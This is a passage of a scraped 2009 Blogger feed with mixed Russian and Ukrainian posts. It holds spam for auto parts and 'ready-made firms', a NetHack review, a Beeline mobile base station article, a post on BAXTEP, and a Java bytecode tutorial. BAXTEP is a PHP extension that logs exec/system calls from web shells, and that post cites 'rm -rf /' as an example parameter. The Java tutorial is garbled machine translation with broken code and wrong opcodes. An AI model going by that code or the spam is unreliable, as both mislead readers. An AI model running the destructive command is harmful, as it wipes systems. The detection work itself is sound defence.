href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3070072652816612959' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3070072652816612959'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3070072652816612959'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8393394911436872180</id><published>2009-10-04T13:52:00.000-07:00</published><updated>2009-10-04T13:56:32.734-07:00</updated><title type='text'></title><content type='html'>Магазин запчасти - большой ассортимент в наличии, срочный заказ, на сайте используется уникальная поисковая система Price-AZ (искать запчасти можно на любые автомобили). Уникальность поисковой системы заключается в поиске не только по номеру но и по названию автозапчасти. При магазине есть небольшой автосервис... &lt;br /&gt;&lt;br /&gt;Недавно с етого сайта заказал несколько &lt;a href='http://polga.ru'&gt;запчастей&lt;/a&gt;&lt;br /&gt;... &lt;br /&gt;Отличие етой слыжбы в том что вышло на много дишевле чем на других сайтах ..&lt;br /&gt;+ Ремонт вышел дишевле чем на СТО .&lt;br /&gt;Советую обратить внемание на етот сайт если у вас есть машына ... &lt;br /&gt;А вот и моя машынка :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://images.drive2.ru/car.photos/3800/000/000/021/692/88cbb58d51d95604-main.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 480px; height: 360px;" src="http://images.drive2.ru/car.photos/3800/000/000/021/692/88cbb58d51d95604-main.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href='http://polga.ru'&gt;Запчасти&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8393394911436872180?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8393394911436872180/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8393394911436872180' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8393394911436872180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8393394911436872180'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/price-az.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3134382283436980699</id><published>2009-09-30T01:52:00.000-07:00</published><updated>2009-09-30T01:57:48.363-07:00</updated><title type='text'>Юридические услуги</title><content type='html'>Магазин юридических услуг&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://caesararts.com/users/CAESAR/upload/image/mem/svidetel.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 300px; height: 248px;" src="http://caesararts.com/users/CAESAR/upload/image/mem/svidetel.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Юредические услуги любого типа , от магазина юредических услуг.&lt;br /&gt;&lt;a href='http://77rus.info/catalog/'&gt;готовые фирмы 2008&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3134382283436980699?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3134382283436980699/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3134382283436980699' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3134382283436980699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3134382283436980699'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/blog-post_30.html' title='Юридические услуги'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-6602913731945384312</id><published>2009-09-16T02:23:00.001-07:00</published><updated>2009-09-16T02:25:16.127-07:00</updated><title type='text'>NetHack. Об игре</title><content type='html'>Многие, уверен, знают эту замечательную игру и убили на нее не одну неделю своей жизни. По моему скромному мнению — это одна из лучших игр из ныне существующих.&lt;br /&gt;Появилась она очень давно — в 1987 году, через семь лет после выхода Roque — прародителя нетхака и основателем жанра "rogue-подобных игр".&lt;br /&gt;Nethack — самый яркий ее представитель.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.picamatic.com/show/2009/09/13/01/49/5067975_654x336.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 654px; height: 336px;" src="http://www.picamatic.com/show/2009/09/13/01/49/5067975_654x336.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;И что же такого интересного и захватывающего в этой игре? — спросите вы. И я вам отвечу — возможности игры, графика, геймплей, сюжет.&lt;br /&gt;Да-да. Вы не ослышались. Именно это и ценно в этой игре.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.picamatic.com/show/2009/09/13/01/50/5067984_654x336.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 654px; height: 336px;" src="http://www.picamatic.com/show/2009/09/13/01/50/5067984_654x336.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Графика&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Основная проблема современных игр с современными требованиями — это нарисовать все то, что происходит. Я думаю, поэтому в современных играх нельзя взять чей-то труп и орудовать им, как оружием. Или взять гранатомет и использовать его в качестве дубинки. Или освежевать убитого дракона и натянуть на себя его шкуру.&lt;br /&gt;Как это нарисовать? Как должен себя вести персонаж и окружение в таком случае? Не нарисуют, а если нарисуют, то схематически. Приходиться додумывать :)&lt;br /&gt;В nethack'е эта проблема решена гениально — додумывайте все сами. Впрочем, это общая особенность всех ASCII-art игр.&lt;br /&gt;«Видите, символ процента? Это еда. Она зеленая? Тогда это или труп лепрекона, или водоросли.» Собственно графическим адаптером выступит ваше воображение :)&lt;br /&gt;Через некоторое время вы будете рефлекторно бояться пурпурной «L», ибо для вас это уже страшный монстр Архи-Лич, который проклянет ваш магический рюкзачок (что если не смерть, то жизнь высокой ценой) и практически не обращать внимание на ужей (newt) ползающих у вас под ногами в виде желтеньких двоеточий.&lt;br /&gt;Конечно же есть графические версии этой игры. Даже про 3D слышал. Но это все — только мешает. Попробовать, конечно, стоит. Я, например, попробовал и вернулся назад к любимому ASCII-art.&lt;br /&gt;&lt;br /&gt;По просьбам читателей. Графическая версия выглядит вот так:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.picamatic.com/show/2009/09/15/07/20/5098014_640x480.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://www.picamatic.com/show/2009/09/15/07/20/5098014_640x480.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Кстати, еще есть изометрические графические версии: заброшенная Falcon's Eye и ныне здравствующая Vulture's Eye. (Infernalподсказал)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Сюжет&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Сюжет прост до безобразия. Вы, искатель приключений, спускаетесь в глубокое-глубокое подземелье в поисках амулета Йендора. Спустись, возьми, принеси и получи вечную жизнь в подарок. Хеппи энд.&lt;br /&gt;Сюжет не отвлекает от игрового процесса и абсолютно не указывает вам что нужно делать сиюминутно. И это самое главное.&lt;br /&gt;И, в качестве бонуса у вас будет один единственный квест (уникальный для типа персонажа), по окончанию которого получаете замечательный актефакт… Какой? It depends&lt;br /&gt;Одна игра — одна цель. Ничего лишнего.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Геймплей и возможности игры&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Мышь в первоначальной версии не участвовала вовсе, ибо не все компьютеры на момент выхода игры были с мышью. Позже, конечно сделали примитивную поддержку мыши, но даже не знаю зачем — она там вовсе не нужна. Все управление осуществляется с помощью клавиатуры, причем практически всей клавиатуры (думаю, не удивил).&lt;br /&gt;В отличие от типичных представителей RPG, эта игра происходит в пошаговом режиме, чем невольно вызывает ассоциацию с шахматами. Что-то произошло — не спешите жать на кнопки. Посмотрите на текущие возможности, поразмышляйте. Совсем туго — сохранитесь и отложите важное решение до завтра (благо уже четыре утра на часах и вы уже часов эдак восемь играете не отрываясь :)&lt;br /&gt;&lt;br /&gt;Типичная ситуация: ваш персонаж в трех шагах от смерти. Стоит рядом агрессивно настроеный жирный тролль, который и не собирается умирать. Типичная RPG предлагает на ваш выбор весьма скудный набор действий: дерись до смерти, бутылочка жизни и дерись до смерти или беги со всех ног.&lt;br /&gt;А в нетхаке набор решений ситуации безграничен. Можно, например взять волшебную палку-копалку (wand of dig) и колдонуть под ноги. Провалимся на этаж ниже, зато выживем. Или взять маркер и написать на полу волшебное слово «Elbereth». Ни один монстр не смеет ступить на эту надпись. Или вообще — использовать заклинание полиморфа на монстра и надеятся, что он превратиться в что-то маленькое и жалкое. Или, достать из заначки труп кокатриса и вмазать тролю что есть силы. Кокатрис превращает в камень всех, до кого дотронется (надеюсь, ваш персонаж надел перчатки?). Вместо тролля у вас будет статуя тролля. Живем дальше. Свиток телепортации тоже весьма эффективно спасет вас он немируемой гибели. Телепортируйтесь подальше. Оденьте кольцо невидимости. И ваш персонаж тихонечко уберется зализывать раны. Прочитайте свиток земли (scroll of earth) на тролля свалится огромный валун. Читайте свиток геноцида (scroll of genocide) и уничтожте всех троллей. Помолитесь, наконец своему божеству (alt + p)! Бог услышит ваши молитвы и восстановит вам здоровье на правах чуда. Впечатляет?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Сохраняйтесь почаще&lt;br /&gt;&lt;br /&gt;Все эти потуги оправданы, ибо самое мощное заклинание всех времен и народов «save and load» не работает, как и в diablo, например. Только «сохраниться и выйти». И, как в диабло на хардкоре, персонаж может умереть лишь один раз :) Крепко задумайтесь, прежде чем что-либо сделать. Это может оказаться фатальным для вашего персонажа!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Знание английского и переводы&lt;br /&gt;&lt;br /&gt;Было сделано куча попыток русифицировать nethack, дабы сделать его более популярным среди русскоязычного населения. Но пара ночей и красные глаза позволят вам свободно ориентироваться в английской версии. Могу только дать совет ставить сразу английскую версию, и переводить все, что непонятно со словарем. Сложности с языком испытываешь первых десять смертей.&lt;br /&gt;Тем, кто все-таки решился на русский нетхак — вот вам ссылка. Русский неполноценный, вперемешку с английским, но все же есть. Но, умоляю! Попробуйте в английскую! :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ссылки&lt;br /&gt;&lt;br /&gt;На последок — порция ссылок на все случаи жизни.&lt;br /&gt;&lt;br /&gt;    * Официальный сайт игры&lt;br /&gt;    * Нетхако-вики&lt;br /&gt;    * Сообщество живого журнала «nethack_ru»&lt;br /&gt;    * Русская википедия о нетхаке со своей порцией ссылок&lt;br /&gt;    * Английская википедия о нетхаке со своей порцией ссылок&lt;br /&gt;    * Спойлеры. (самая полезная ссылка, после того как разобрался с управлением)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Понравилось? Тогда продолжение следует.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Бесславно убит продавцом магазина. Поделом! Не нужно было дверь ногой вышибать :)&lt;br /&gt;Если сообщество оценит — напишу еще что-нибудь.&lt;br /&gt;P.S.В «Игры» бы перенести... Спасибо. Перенес в «Игры»&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-6602913731945384312?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/6602913731945384312/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=6602913731945384312' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/6602913731945384312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/6602913731945384312'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/nethack.html' title='NetHack. Об игре'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3644446321874907456</id><published>2009-09-16T02:19:00.001-07:00</published><updated>2009-09-16T02:21:53.101-07:00</updated><title type='text'>Навіщо Білайну Камаз за 5 мільйонів?</title><content type='html'>Коли в одній невеликій точці на карті збирається стотисячний натовп, за нею треба око та око, а то накоїв ще чого-небудь - потім клопоту. От і доводиться нашим правоохоронцям, про доблесть яких ходять легенди, приїжджати туди і стежити своїми пильними очима за тим, щоб все було добре. Та й медики не залишаються осторонь: ці чудові люди в білих халатах складають компанію панам в сірій формі на той випадок, якщо комусь раптом стане не дуже добре. Але це тільки вершина айсберга! Насправді, на заходах, подібних до реконструкції Бородінської битви, яка відбулася 6 вересня в ста кілометрах від Москви, працюють тисячі інших людей, які роблять багато різних корисних справ, щоб усім, хто приїхав туди відпочити, було максимально комфортно. У їх рядах можна було зустріти також і двох людей у чорно-жовтих куртках на білому Камаз вартістю п'ять мільйонів рублів.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 1000px; height: 667px;" src="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/1.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;У стороні від основних гулянь, в чистому полі ці двоє розмістили першу і поки єдину в Росії мобільний базову станцію, що забезпечує в місцях скупчення людей до 200 додаткових каналів голосового зв'язку в один момент часу. Проходив повз люди навряд чи здогадувалися про призначення вантажівки зі зростаючою з нього 17-метрової щоглою, і лише ті, хто курсував зовсім поруч, могли помітити на його бортах емблеми компанії Білайн і сказати глибокодумно: «Ах от чому в мене такий гарний прийом!»&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.cyberstyle.ru//misc/Image/reviews/beeline_mbs_ina_action/2.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 667px; height: 1000px;" src="http://www.cyberstyle.ru//misc/Image/reviews/beeline_mbs_ina_action/2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Строго кажучи, згаданих грошей коштує, звичайно, не сам Камаз (для довідки: новенький камаз коштує близько 1 млн. руб), і навіть не здоровенний білий контейнер позаду кабіни, а те, що знаходиться всередині нього: стійки з комунікаційним обладнанням Ericsson і Alcatel , а також антени, що ростуть з даху.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/3.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 1000px; height: 667px;" src="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;З «похідного» стану в робочий МБС може перейти приблизно за годину: у боку висуваються гідравлічні упори, шасі вирівнюється, далі починається інтеграція привезеного обладнання та існуючої мережі. Вибір способу зв'язку цілком і повністю залежить від умов, в яких опинився високотехнологічний Камаз: автоматика може самостійно навестися і налагодити передачу даних через супутник, через релейну антену або навіть за допомогою лазера. Правда, максимальна відстань, на якому можна ефективно використовувати лазер, - порядку півтора кілометрів.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/4.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 667px; height: 1000px;" src="http://www.cyberstyle.ru/misc/Image/reviews/beeline_mbs_ina_action/4.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Природно, для забезпечення безперервного зв'язку на 200 голосових лініях одночасно потрібно досить багато енергії, а тому оператори мобільного базової станції насамперед шукають місцеве джерело електрики. Але навіть якщо його не вдається знайти, вони не журяться довго, тому що на МБС встановлений дизельний генератор, а поруч з ним стоїть 700 літрова каністра з дизельним паливом, та й у баках у Камаза теж не 95-й бензин, так що час автономної роботи такої станції досягає двох тижнів, а то й більше. В цьому випадку мова йде про те, скільки витримає екіпаж: у наявності хоч і є два спальних місця, розраховані вони більше все-таки на нетривалі терміни.&lt;br /&gt;&lt;br /&gt;Постає питання, навіщо я вам це розповідаю вдруге, якщо презентація цієї ж самої мобільної базової станції пройшла в минулому році? Справа в тому, що тоді тільки проводилися її випробування, і виходили різні дозволи. А зараз - це вже цілком працездатний зразок, який побував у кількох «гарячих точках».&lt;br /&gt;&lt;br /&gt;Чи варто чекати відповіді від інших операторів на введення в експлуатацію першого МБС Білайну, поки сказати складно. МТС ні про що таке не заявляла, а в Мегафоні взагалі вважають подібні розробки безперспективними. Але факт залишається фактом: на минулому святі найбільш мобільними себе відчували абоненти жовто-смугастих, радісно повідомляючи оточуючим про наявність впевненого прийому і про відсутність збоїв в мережі.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3644446321874907456?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3644446321874907456/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3644446321874907456' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3644446321874907456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3644446321874907456'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/5.html' title='Навіщо Білайну Камаз за 5 мільйонів?'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-2811380106864256613</id><published>2009-09-16T02:15:00.001-07:00</published><updated>2009-09-16T02:16:25.071-07:00</updated><title type='text'>Вахтер: на сторожі системи</title><content type='html'>«Одного разу, в холодну зимову пору,&lt;br /&gt;Залили на сервер бекдорчіков гору ... »&lt;br /&gt;&lt;br /&gt;Народне адмінское творчість&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.my-sosedi.ru/wp-content/uploads/2009/02/4440c214723b8.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 700px; height: 547px;" src="http://www.my-sosedi.ru/wp-content/uploads/2009/02/4440c214723b8.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Вобщем як то раз на одному з серверів виявився php-shell, через який злобні хакери зламали затишний дневничок ™ хорошої людини.&lt;br /&gt;Після двогодинного колупання в логах Апача знайшлася діра, через яку залили шелл.&lt;br /&gt;Діру прикрили, дневничок повернули до життя з резервних копій, і сіли думу думати.&lt;br /&gt;&lt;br /&gt;Після третьої пляшки пива народилася ідея: «А чому б не відловлювати виконання системних викликів з php скриптів?».&lt;br /&gt;Сенс у тому, що більшість php-Шелл так чи інакше використовують функції exec ();, system ();, shell_exec (); або passthru ();. Відповідно до виконання цих функцій можна перехопити і тихенько в лог записати, що такого-то числа такий-то скрипт на такий-то рядку викликав функцію exec () з параметром «rm-rf /».&lt;br /&gt;Сказано-зроблено. Доброму людині kastigar було поставлено тех. завдання і робота закипіла.&lt;br /&gt;Вже як він расковирівал тонкощі Zend Engine я розповідати не буду, але врешті-решт народилося розширення для PHP4/PHP5 під кодовим ім'ям BAXTEP.&lt;br /&gt;Спочатку ми не планували викладати код в загальний доступ, бо писалося все загалом і в цілому «для себе» і «від і до» не тестувалося, але дух open source все-таки взяв своє - і исходники були викладені на GoogleCode.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-2811380106864256613?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/2811380106864256613/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=2811380106864256613' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2811380106864256613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2811380106864256613'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/blog-post_16.html' title='Вахтер: на сторожі системи'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7686637114128156846</id><published>2009-09-16T02:11:00.002-07:00</published><updated>2009-09-16T02:13:42.122-07:00</updated><title type='text'>Структура байт-коду віртуальної машини Java</title><content type='html'>Останнім часом на Хабре з'явилися статті які зачіпають маніпуляцію байт-коду. Що змусило мене опублікувати дотримуюся статтю присвячену його структурі.&lt;br /&gt;&lt;br /&gt;У платформи java є дві особливості. Для забезпечення платформ програма спочатку компілюється в проміжна мова низького рівня - байт-код. Друга особливість завантаження виконуваних класів відбувається за допомогою розгортаються classloader. Це механізм забезпечує більшу гнучкість і дозволяє модифікувати виконуваний код при завантаження, створювати і довантажувати нові класи під час виконання програми.&lt;br /&gt;&lt;br /&gt;Така техніка широко застосовується для реалізації AOP, створення тестових фреймворк, ORM. Особливо хочеться відзначити terracotta, продукт з гарною ідеєю кластеризації jvm і на всю котушку використовує модифікації байт-коду. Ця замітка буде присвячена огляду структури байт-коду, першій частині цієї сильної зв'язки.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Кожному класу в java відповідає один скомпільованій файл. Це справедливо навіть для підкласів або анонімним класів. Такий файл містить інформацію про ім'я класу, його батьки, список інтерфейсів які він реалізує, перерахування його полів і методів. Важливо відзначити, що після компіляції інформації що містить директива import втрачається і всі класи іменуються тепер через повний шлях. Наприклад в місце String буде записано java / lang / String.&lt;br /&gt;&lt;br /&gt;Найцікавіше як будуть виглядати методи класу в байт-коді. Будемо спостерігати во, що трансформується наступний клас:&lt;br /&gt;&lt;br /&gt;package org;&lt;br /&gt;&lt;br /&gt;class Test (&lt;br /&gt;     private String name;&lt;br /&gt;&lt;br /&gt;     public String getName () (&lt;br /&gt;         return name;&lt;br /&gt;     )&lt;br /&gt;&lt;br /&gt;     public void setName (String name) (&lt;br /&gt;         this.name = name;&lt;br /&gt;     )&lt;br /&gt;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Почнемо з заголовка. У ньому міститься інформація про назву методу те, що метод викликається без параметрів і тип повертається аргументу.&lt;br /&gt;&lt;br /&gt;Байт-код стекол-орієнтована мова, схожий за своєю структурою на асемблер. Що б провести операції з даними їх спочатку потрібно покладе на стек. Ми хочемо взяти полі у об'єкт. Що б це сделять потрібно його покласти в стек. У байт-коді немає імен змінних, у них є номери. Нульовий номер у посилання на поточний об'єкт або у зміною this. Потім йдуть параметри для виконання методу. Потім інші змінні.&lt;br /&gt;&lt;br /&gt;Команда ALOAD 0 кладе змінну this на стек. Що б на стек покласти тип даних, відмінний від посилання потрібно скористатися іншою командою. Для long буде LLOAD, а для doubles [] буде DALOAD.&lt;br /&gt;&lt;br /&gt;Наступна команда GETFIELD, прибирає зі стека посилання на об'єкт і кладе примітивний тип або посилання на поле даного об'єкта. У неї є два параметри. Перший ім'я класу, друге ім'я змінної. Якщо ж змінна статична, то попередньо класти на стек нічого не потрібно, а команду потрібно замінити на GETSTATIC з темі ж параметрами.&lt;br /&gt;&lt;br /&gt;Остання команда говорить, що метод завершений і повертає значення типу посилання зі стека.&lt;br /&gt;&lt;br /&gt;Сетер має трохи більш складну структуру.&lt;br /&gt;&lt;br /&gt;public setName (Ljava / lang / String;) V&lt;br /&gt;ALOAD 0&lt;br /&gt;ALOAD 1&lt;br /&gt;PUTFIELD org / Test name&lt;br /&gt;RETURN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Даний метод нічого не повертає. Перші дві команди кладуть на стек змінну this і параметр для виконання методу. Потім викликається команда PUTFIELD (PUTSTATIC для статичного поля) яка встановить значення поля об'єкту і прибере зі стека останні два значення. Остання команда вихід з методу.&lt;br /&gt;&lt;br /&gt;Додамо до нашого об'єкт ще пару методів і подивимося який байт-код їм відповідає.&lt;br /&gt;&lt;br /&gt;     public void forTest (Boolean b) (&lt;br /&gt;         System.out.prinln (b);&lt;br /&gt;     )&lt;br /&gt;&lt;br /&gt;     public Long testMethods (Collection &lt;Long&gt; testInterface) (&lt;br /&gt;         Long a = System.curretM ();&lt;br /&gt;         forTest (testInterface.contains (a));&lt;br /&gt;         return a;&lt;br /&gt;     )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;testMethod має такі уявлення.&lt;br /&gt;&lt;br /&gt;INVOKESTATIC java / lang / System currentTimeMillis () J&lt;br /&gt;LSTORE 2&lt;br /&gt;ALOAD 0&lt;br /&gt;ALOAD 1&lt;br /&gt;LLOAD 2&lt;br /&gt;INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;&lt;br /&gt;INVOKEINTERFACE java / util / Collection contains (Ljava / lang / Object;) Z&lt;br /&gt;INVOKESTATIC java / lang / Boolean valueOf (Z) Ljava / lang / Boolean;&lt;br /&gt;INVOKEVIRTUAL org / Test forTest (Ljava / lang / Boolean;) V&lt;br /&gt;LLOAD 2&lt;br /&gt;INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;&lt;br /&gt;ARETURN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Перша команда викликає статичний метод у класу System. Друга запам'ятовує результат виклику методу currentTimeMillis у змінній з другим номером. Потім ми кладемо змінну this, параметр методу і змінну з номером 2 на стек. Перетворять змінну до типу java / lang / Long. І перевіряємо, що вона в нас міститься в колекції, викликаючи метод у параметра виконується. У нас параметр інтерфейс, тому застосовується команда INVOKEINTERFACE. Для методу класу необхідно використовувати INVOKEVIRTUAL. Що б викликати метод у об'єкт або інтерфейсу необхідно, що б на стеку лежав об'єкт, потім параметри методу що викликається. У результаті виклику методу вони замінюватися на результат або просто заберуться з стека, якщо метод нічого повертає. Остання три команди кладуть зміну на стек, перетворюють її на об'єкт і повертають її як значення методу.&lt;br /&gt;&lt;br /&gt;Що б завершити наш екскурс в байт-код додамо останній метод і подивимося на цикли і умовні оператори.&lt;br /&gt;&lt;br /&gt;     public void testAriphmentics () (&lt;br /&gt;        int i = -17;&lt;br /&gt;         while (i &lt;10) (&lt;br /&gt;             if (i &lt;0) (&lt;br /&gt;                 i = i + 7;&lt;br /&gt;             )&lt;br /&gt;             i = i * 13;&lt;br /&gt;         )&lt;br /&gt;     )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Він в байт-коді буде виглядати так&lt;br /&gt;&lt;br /&gt;ACC_FINAL -17&lt;br /&gt;ISTORE 1&lt;br /&gt;Label: L1466604866&lt;br /&gt;ILOAD 1&lt;br /&gt;ACC_FINAL 10&lt;br /&gt;IF_ICMPGE L329949514&lt;br /&gt;ILOAD 1&lt;br /&gt;IFGE L658705244&lt;br /&gt;ILOAD 1&lt;br /&gt;ACC_FINAL 7&lt;br 